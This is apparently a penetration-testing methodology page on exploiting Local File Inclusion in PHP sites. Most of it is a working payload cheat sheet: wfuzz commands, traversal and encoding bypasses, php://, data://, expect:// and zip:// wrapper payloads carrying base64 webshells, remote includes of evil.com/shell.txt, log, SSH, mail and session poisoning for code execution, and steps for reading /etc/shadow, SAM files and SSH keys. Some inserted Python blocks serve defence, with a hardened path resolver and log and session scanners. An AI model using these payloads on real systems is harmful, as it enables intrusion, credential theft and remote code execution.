# Local File Inclusion

### Fuzzing with wfuzz

{% embed url="https://www.hackingarticles.in/a-detailed-guide-on-wfuzz/" %}

The key is to look at unusual responses and filter out the common ones with `-hh`. In this case most responses were around 300 characters long, so whenever one came back with about 13000 characters it meant the content of the included file was being displayed.

This also gives us a hint about how the Local File Inclusion is working.

#### Windows

{% embed url="https://gist.github.com/korrosivesec/a339e376bae22fcfb7f858426094661e" %}

Reference this list for LFI so we can get credentials for other services around.

```
wfuzz -w /usr/share/wordlists/wfuzz/vulns/lfi-windows.txt -u http://192.168.242.53:8080/site/index.php\?page\=FUZZ
```

#### Linux

```
wfuzz -w /usr/share/wordlists/wfuzz/vulns/lfi-linux.txt -u http://192.168.242.53:8080/site/index.php\?page\=FUZZ
```

The guide above should help you depending on how the website reacts.

Look for files associated with other services around that could give you access.

* [ ] `/etc/passwd` and `/etc/shadow`
* [ ] `/home/user/.ssh/id_rsa`, then fix its permissions and use it to SSH in
* [ ] Look at services around; for example, FileZilla stores credentials for the FTP server in cleartext.

#### LFI + TOMCAT

Look at the version of Tomcat; depending on it we can gather credentials for the manager application and gain RCE by uploading a WAR file.

![](/files/ZLDiDb0eihun4Ehb3zNe)

By traversing to `/usr/share/**tomcat9**/etc/tomcat-users.xml` (the directory name depends on the installed version)

we were able to gather credentials.

#### LFI + Redis

{% embed url="https://lyethar.gitbook.io/methodology/welcome/exploitation/vulnerable-services/redis-exploitation" %}

Try to enumerate where files can be written using Redis, write a PHP reverse shell or any other code there, and then use the LFI to include and execute the code we wrote.

#### LFI + Filezilla

Using the reference list above we can gather credentials for the FileZilla FTP server.

### Bypassing Tricks

```
http://example.com/index.php?page=....//....//etc/passwd
http://example.com/index.php?page=..///////..////..//////etc/passwd
http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
```

#### Null byte

This has been patched since PHP 5.4, so it only works against older versions.

```
http://example.com/index.php?page=http://evil.com/shell.txt%00
```

#### Double encoding

```
http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt
```

#### From existing folder

```
http://example.com/index.php?page=utils/scripts/../../../../../etc/passwd
```

#### Wrapper php://filter

```
http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php
http://example.com/index.php?page=php://filter/convert.iconv.utf-8.utf-16/resource=index.php
http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
http://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php
```
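To see why the sequences above slip past a string-stripping filter but not a canonicalising allowlist, here is an added Python example (it is not from the original page or from any of the linked projects). It models two server-side checks: `naive_resolve`, modelled on the common `str_replace('../', '', $page)` fix, and `hardened_resolve`, which decodes completely, rejects null bytes and anything with a scheme, canonicalises the path and requires the result to be an allowlisted file. The include root `/var/www` and the allowlist are assumptions for the demo.

```python
import posixpath
from typing import Optional
from urllib.parse import unquote

# Assumed (hypothetical) layout: the vulnerable script does include(BASE . "/" . $_GET["page"]).
BASE = "/var/www"
# Constructed allowlist: the only files the application should ever include.
KNOWN_PAGES = {"/var/www/about.php", "/var/www/contact.php"}

# Payloads from the bypass list above, plus one legitimate page name.
PAYLOADS = [
    "about",
    "....//....//etc/passwd",
    "..///////..////..//////etc/passwd",
    "/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd",
    "utils/scripts/../../../../../etc/passwd",
    "http://evil.com/shell.txt%00",
    "http:%252f%252fevil.com%252fshell.txt",
    "php://filter/convert.base64-encode/resource=index.php",
    "data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pgo=",
]


def fully_decode(value: str, rounds: int = 3) -> str:
    """Undo up to `rounds` layers of percent-encoding so %5C and %252f become plain characters."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def naive_resolve(page: str) -> str:
    """Model of a common broken fix: str_replace('../', '', $page), then concatenate and include.

    One pass turns '....//' into '../', so the traversal is rebuilt by the filter itself."""
    stripped = fully_decode(page).replace("../", "")
    return posixpath.normpath(BASE + "/" + stripped)


def hardened_resolve(page: str) -> Optional[str]:
    """Return the file to include, or None when the request must be refused.

    Decode completely, refuse null bytes and anything carrying a scheme (php://, data:,
    zip://, expect://, remote URLs), fold backslashes into slashes, canonicalise, and
    finally require the result to be inside BASE and on the allowlist."""
    decoded = fully_decode(page)
    if "\x00" in decoded or ":" in decoded:
        return None
    decoded = decoded.replace("\\", "/")
    candidate = posixpath.normpath(BASE + "/" + decoded)
    if not candidate.startswith(BASE + "/"):
        return None                      # left the include directory
    if not candidate.endswith(".php"):
        candidate += ".php"
    return candidate if candidate in KNOWN_PAGES else None


def escapes_base(path: str) -> bool:
    """True when a resolved path lies outside the include directory."""
    return not path.startswith(BASE + "/")


if __name__ == "__main__":
    for p in PAYLOADS:
        naive = naive_resolve(p)
        flag = " (ESCAPED)" if escapes_base(naive) else ""
        print(f"{p[:45]:<45} naive={naive}{flag}  hardened={hardened_resolve(p)}")
```

Run the file to print both resolutions side by side: the `....//` payload collapses to `/etc/passwd` under the naive filter, while every traversal and wrapper variant returns `None` from the hardened check. Note that the `....//` sequence never leaves the include root by itself; the hardened function rejects it only because no such page is on the allowlist, which is why the allowlist, not the path arithmetic, is what actually closes the hole.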

### RCE Methods

#### PHP Wrappers

#### Wrapper php://input

```
curl -k -v "http://example.com/index.php?page=php://input" --data "<?php echo shell_exec('id'); ?>"
```

Since we have code execution, all that is left is to get a reverse shell using one of the payloads from PayloadsAllTheThings.

#### Wrapper data://

Encode the PHP payload and pass it through the `data://` wrapper:

```
echo '<?php phpinfo(); ?>' | base64 -w0
# PD9waHAgcGhwaW5mbygpOyA/Pgo=

http://example.com/index.php?page=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pgo=
```

Or without base64:

```
menu.php?file=data:text/plain,<?php echo shell_exec("dir") ?>
```

If there is code execution you should see the `phpinfo()` output; go to `disable_functions` and craft a payload with functions which aren't disabled. Code execution with:

* `exec`
* `shell_exec`
* `system`
* `passthru`
* `popen`

Example:

```
echo '<?php passthru($_GET["cmd"]);echo "Shell done !"; ?>' | base64 -w0
# PD9waHAgcGFzc3RocnUoJF9HRVRbImNtZCJdKTtlY2hvICJTaGVsbCBkb25lICEiOyA/Pgo=

http://example.com/index.php?page=data://text/plain;base64,PD9waHAgcGFzc3RocnUoJF9HRVRbImNtZCJdKTtlY2hvICJTaGVsbCBkb25lICEiOyA/Pgo=
```

If "Shell done !" shows up on the webpage, then there is code execution and you can do things like:

```
http://example.com/index.php?page=data://text/plain;base64,PD9waHAgcGFzc3RocnUoJF9HRVRbImNtZCJdKTtlY2hvICJTaGVsbCBkb25lICEiOyA/Pgo=&cmd=ls
```

Further variants (`data://` and `data:` both appear in the wild):

```
http://example.net/?page=data://text/plain,<?php echo base64_encode(file_get_contents("index.php")); ?>
http://example.net/?page=data://text/plain,<?php phpinfo(); ?>
http://example.net/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
http://example.net/?page=data:text/plain,<?php echo base64_encode(file_get_contents("index.php")); ?>
http://example.net/?page=data:text/plain,<?php phpinfo(); ?>
http://example.net/?page=data:text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
```

NOTE: the base64 payload in the last lines is `<?php system($_GET['cmd']);echo 'Shell done !'; ?>`.

{% embed url="https://www.youtube.com/watch?v=Jl36YdzKPz4" %}

#### Wrapper Expect://

```
http://example.com/index.php?page=expect://id
```

#### Wrapper zip://

```
# escape the $ so the shell does not expand $_GET to an empty string
echo "<pre><?php system(\$_GET['cmd']); ?></pre>" > payload.php
zip payload.zip payload.php
mv payload.zip shell.jpg
rm payload.php

http://example.com/index.php?page=zip://shell.jpg%23payload.php
```

### LFI to RCE via controlled log file

Append your PHP code to a log file by making a request to the service that writes it (Apache, SSH, ...) and then include that log file.

```
http://example.com/index.php?page=/var/log/apache/access.log
http://example.com/index.php?page=/var/log/apache/error.log
http://example.com/index.php?page=/var/log/apache2/access.log
http://example.com/index.php?page=/var/log/apache2/error.log
http://example.com/index.php?page=/var/log/nginx/access.log
http://example.com/index.php?page=/var/log/nginx/error.log
http://example.com/index.php?page=/var/log/vsftpd.log
http://example.com/index.php?page=/var/log/sshd.log
http://example.com/index.php?page=/var/log/mail
http://example.com/index.php?page=/var/log/httpd/error_log
http://example.com/index.php?page=/usr/local/apache/log/error_log
http://example.com/index.php?page=/usr/local/apache2/log/error_log
```

#### RCE via SSH

Try to ssh into the box with a PHP code as username `<?php system($_GET["cmd"]);?>`.

```
# quote the username so the shell does not interpret <, ? and ;
ssh '<?php system($_GET["cmd"]);?>'@10.10.10.10
```

Then include the SSH log files inside the Web Application.

```
http://example.com/index.php?page=/var/log/auth.log&cmd=id
```

#### RCE via vsftpd logs

The logs of this FTP server are stored in `/var/log/vsftpd.log`. If you have an LFI and can reach an exposed vsftpd server, you can try to log in with the PHP payload as the username and then access the log through the LFI.

![](/files/rOFEug3trr7kFudrONZ7)

#### RCE via Mail

First send an email through the open SMTP server, then include the log file located at `/var/log/mail` via `http://example.com/index.php?page=/var/log/mail`.

```
root@kali:~# telnet 10.10.10.10 25
Trying 10.10.10.10...
Connected to 10.10.10.10.
Escape character is '^]'.
220 straylight ESMTP Postfix (Debian/GNU)
helo ok
250 straylight
mail from: mail@example.com
250 2.1.0 Ok
rcpt to: root
250 2.1.5 Ok
data
354 End data with <CR><LF>.<CR><LF>
subject: <?php echo system($_GET["cmd"]); ?>
data2
.
```

In some cases you can also send the email with the `mail` command line.

```
mail -s "<?php system(\$_GET['cmd']);?>" www-data@10.10.10.10 < /dev/null
```

![](/files/63GnUsYsIejQKOujSBU7)

#### RCE via Apache logs

Poison the User-Agent in access logs:

```
$ curl http://example.org/ -A "<?php system(\$_GET['cmd']);?>"
```

Note: The logs will escape double quotes so use single quotes for strings in the PHP payload.

Then request the logs via the LFI and execute your command.

```
$ curl "http://example.org/test.php?page=/var/log/apache2/access.log&cmd=id"
```

```
kali@kali:~$ nc -nv 10.11.0.22 80
(UNKNOWN) [10.11.0.22] 80 (http) open
<?php echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>';?>

HTTP/1.1 400 Bad Request
```

Regardless of the 400 response, the malformed request line is still written to the access log, so we are still able to include `C:\xampp\apache\logs\access.log` and execute the shell.
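Everything in this section and in the "Bypassing Tricks" list leaves a trace in the web server's own logs, so here is an added Python example (not from the original page or the linked projects) that scans Apache combined-format access log lines for LFI indicators: traversal, the `php://`, `data:`, `expect://` and `zip://` wrappers, double encoding, null bytes, remote URLs in a parameter, references to the sensitive files named on this page, and PHP open tags in the User-Agent or request line, which is what log poisoning looks like from the server side. The log lines are constructed for the demo; the IPs, timestamps and user agents are made up.

```python
import re
from typing import Optional
from urllib.parse import unquote

# Constructed Apache combined-format lines (addresses, times and user agents are invented).
LOG_LINES = [
    '10.0.0.5 - - [12/Mar/2024:10:01:02 +0000] "GET /site/index.php?page=about HTTP/1.1" 200 3120 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [12/Mar/2024:10:01:07 +0000] "GET /site/index.php?page=....//....//etc/passwd HTTP/1.1" 200 13021 "-" "Wfuzz/3.1.0"',
    '10.0.0.9 - - [12/Mar/2024:10:01:08 +0000] "GET /site/index.php?page=php://filter/convert.base64-encode/resource=index.php HTTP/1.1" 200 9800 "-" "Wfuzz/3.1.0"',
    '10.0.0.9 - - [12/Mar/2024:10:01:09 +0000] "GET /site/index.php?page=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pgo= HTTP/1.1" 200 41000 "-" "curl/8.4.0"',
    '10.0.0.9 - - [12/Mar/2024:10:01:11 +0000] "GET / HTTP/1.1" 200 512 "-" "<?php system($_GET[\'cmd\']);?>"',
    '10.0.0.9 - - [12/Mar/2024:10:01:12 +0000] "GET /site/index.php?page=/var/log/apache2/access.log&cmd=id HTTP/1.1" 200 88000 "-" "curl/8.4.0"',
    '10.0.0.9 - - [12/Mar/2024:10:01:13 +0000] "GET /site/index.php?page=http:%252f%252fevil.com%252fshell.txt HTTP/1.1" 500 300 "-" "curl/8.4.0"',
    '10.0.0.9 - - [12/Mar/2024:10:01:14 +0000] "<?php echo \'<pre>\' . shell_exec($_GET[\'cmd\']) . \'</pre>\';?>" 400 226 "-" "-"',
]

# %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"; quoted fields may contain \" escapes.
QUOTED = r'(?:[^"\\]|\\.)*'
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>' + QUOTED + r')" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>' + QUOTED + r')" "(?P<ua>' + QUOTED + r')"$'
)

# Indicators evaluated on the fully decoded request target.
INDICATORS = [
    ("traversal",      re.compile(r"\.\.[\\/]")),
    ("php_wrapper",    re.compile(r"\bphp://", re.I)),
    ("data_uri",       re.compile(r"\bdata:", re.I)),
    ("expect_wrapper", re.compile(r"\bexpect://", re.I)),
    ("zip_wrapper",    re.compile(r"\bzip://", re.I)),
    ("null_byte",      re.compile("\x00")),
    ("remote_url",     re.compile(r"=\s*https?://", re.I)),
    ("sensitive_file", re.compile(
        r"/etc/(passwd|shadow)|/var/log/|/proc/self|/sess_|tomcat-users\.xml|WINDOWS/repair|\.ssh/id_rsa", re.I)),
]
DOUBLE_ENCODED = re.compile(r"%25[0-9A-Fa-f]{2}")   # checked on the raw target, before decoding
PHP_TAG = re.compile(r"<\?php", re.I)               # checked on the raw request line and User-Agent


def analyse(line: str) -> Optional[dict]:
    """Return {'ip', 'status', 'hits'} for a parsable line, None if it is not in combined format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    request, ua = m.group("request"), m.group("ua")
    parts = request.split(" ")
    # A well-formed request line is "METHOD target PROTOCOL"; Apache logs malformed ones verbatim.
    target = parts[1] if len(parts) == 3 and parts[2].startswith("HTTP/") else request
    decoded = unquote(unquote(target))   # two rounds so %252f and %5C arrive as plain characters
    hits = {name for name, rx in INDICATORS if rx.search(decoded)}
    if DOUBLE_ENCODED.search(target):
        hits.add("double_encoding")
    if PHP_TAG.search(request) or PHP_TAG.search(ua):
        hits.add("log_poisoning")        # PHP code placed where the server will write it to disk
    return {"ip": m.group("ip"), "status": int(m.group("status")), "hits": sorted(hits)}


def scan(lines):
    """Return the records for every line that carries at least one indicator."""
    flagged = []
    for line in lines:
        rec = analyse(line)
        if rec and rec["hits"]:
            flagged.append(rec)
    return flagged


if __name__ == "__main__":
    for rec in scan(LOG_LINES):
        print(f"{rec['ip']:<10} {rec['status']}  {', '.join(rec['hits'])}")
```

The last sample line reproduces the situation from the `nc` session above: the server answered 400, but the PHP tag sent as the request line was still recorded and is flagged as `log_poisoning`, which is exactly why a rejected request can still poison the log. Decoding is done twice on the target but the double-encoding check runs on the raw bytes, since `%25` only exists before decoding.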

### LFI to RCE via PHP sessions

Check if the website uses PHP sessions (`PHPSESSID`):

```
Set-Cookie: PHPSESSID=i56kgbsq9rm8ndg3qbarhsbm27; path=/
Set-Cookie: user=admin; expires=Mon, 13-Aug-2018 20:21:29 GMT; path=/; httponly
```

In PHP these sessions are stored in `/var/lib/php5/sess_[PHPSESSID]` or `/var/lib/php/session/sess_[PHPSESSID]` files:

```
/var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27
user_ip|s:0:"";loggedin|s:0:"";lang|s:9:"en_us.php";win_lin|s:0:"";user|s:6:"admin";pass|s:6:"admin";
```

Set the `user` value stored in the session to `<?php system('cat /etc/passwd');?>`:

```
login=1&user=<?php system("cat /etc/passwd");?>&pass=password&lang=en_us.php
```

Use the LFI to include the PHP session file

```
login=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27
```
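The session file above is in PHP's default `php` serialize handler format, where each variable is stored as `name|<serialized value>`. Here is an added Python example (not from the original page or the linked projects) that parses that format, re-encodes a session the way the poisoned login would, and lists any string value containing a PHP open tag, which is the check a defender would run across a session directory. The `s:N:"..."` length prefix is a byte count and is what makes the value boundaries unambiguous, so the parser works on bytes and refuses records whose length does not match; the sample session content is constructed.

```python
import re
from typing import Any, Dict, List

# Constructed session file content in the shape shown above.
SAMPLE_SESSION = (
    b'user_ip|s:0:"";loggedin|s:0:"";lang|s:9:"en_us.php";'
    b'win_lin|s:0:"";user|s:5:"admin";pass|s:8:"password";'
)
PHP_TAG = re.compile(r"<\?php", re.I)


def parse_session(blob: bytes) -> Dict[str, Any]:
    """Parse the `php` serialize_handler format: name|<serialized value>, repeated.

    Scalar types only (s, i, d, b, N). The s:<len> prefix is a byte count, which is why
    the value is sliced by length instead of scanning for the closing quote."""
    pos, out = 0, {}
    while pos < len(blob):
        bar = blob.index(b"|", pos)
        key = blob[pos:bar].decode()
        pos = bar + 1
        kind = blob[pos:pos + 1]
        if kind == b"s":
            colon = blob.index(b":", pos + 2)
            length = int(blob[pos + 2:colon])
            start = colon + 2                       # skip  :"
            value = blob[start:start + length].decode("utf-8", "replace")
            pos = start + length
            if blob[pos:pos + 2] != b'";':
                raise ValueError(f"length prefix of {key!r} does not match its value")
            pos += 2
        elif kind in (b"i", b"d"):
            end = blob.index(b";", pos)
            value = (int if kind == b"i" else float)(blob[pos + 2:end])
            pos = end + 1
        elif kind == b"b":
            value = blob[pos + 2:pos + 3] == b"1"
            pos += 4                                # b:1;
        elif kind == b"N":
            value = None
            pos += 2                                # N;
        else:
            raise ValueError(f"unsupported type {kind!r} at offset {pos}")
        out[key] = value
    return out


def session_encode(values: Dict[str, Any]) -> bytes:
    """Inverse of parse_session for the same scalar types: what session_write_close() stores."""
    out = b""
    for key, value in values.items():
        if value is None:
            enc = b"N;"
        elif isinstance(value, bool):
            enc = b"b:1;" if value else b"b:0;"
        elif isinstance(value, int):
            enc = f"i:{value};".encode()
        elif isinstance(value, float):
            enc = f"d:{value!r};".encode()
        elif isinstance(value, str):
            raw = value.encode("utf-8")
            enc = b's:%d:"%s";' % (len(raw), raw)   # length counts bytes, not characters
        else:
            raise TypeError(f"unsupported value for {key!r}")
        out += key.encode() + b"|" + enc
    return out


def find_php_code(session: Dict[str, Any]) -> List[str]:
    """Names of session variables whose string value contains a PHP open tag."""
    return [k for k, v in session.items() if isinstance(v, str) and PHP_TAG.search(v)]


if __name__ == "__main__":
    print(parse_session(SAMPLE_SESSION))
    # What the poisoned login request above (user=<?php system("cat /etc/passwd");?>) leaves on disk.
    poisoned = session_encode({"login": 1, "user": '<?php system("cat /etc/passwd");?>',
                               "pass": "password", "lang": "en_us.php"})
    print(poisoned)
    print("tainted variables:", find_php_code(parse_session(poisoned)))
```

Nothing in the storage format escapes or transforms the value, so whatever the login form accepted is written to disk byte for byte; the `lang` variable is then the one the vulnerable `include` follows, which is why the second request in the section above points `lang` at the session file itself.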

### LFI to RCE via credentials files

This method requires high privileges inside the application in order to read the sensitive files.

#### Windows version

First extract `sam` and `system` files.

```
http://example.com/index.php?page=../../../../../../WINDOWS/repair/sam
http://example.com/index.php?page=../../../../../../WINDOWS/repair/system
```

Then extract hashes from these files `samdump2 SYSTEM SAM > hashes.txt`, and crack them with `hashcat/john` or replay them using the Pass The Hash technique.

#### Linux version

First extract the `/etc/shadow` file.

```
http://example.com/index.php?page=../../../../../../etc/shadow
```

Then crack the hashes inside in order to login via SSH on the machine.

Another way to gain SSH access to a Linux machine through LFI is by reading the private key file `id_rsa`. If SSH is active, check which user is being used via `/proc/self/status` and `/etc/passwd`, then try to access `/<HOME>/.ssh/id_rsa`.

<details>

<summary>Examples of Local File Inclusion Exploitation </summary>

[https://lyethar.gitbook.io/slort/exploitation](https://lyethar.gitbook.io/slort/exploitation) (Slort PG)

</details>

### Resources

{% embed url="https://book.hacktricks.xyz/pentesting-web/file-inclusion" %}

{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion" %}

{% embed url="https://guide.offsecnewbie.com/web" %}

{% embed url="https://liodeus.github.io/2020/09/18/OSCP-personal-cheatsheet.html#local-file-inclusion--remote-file-inclusion---lfi--rfi" %}

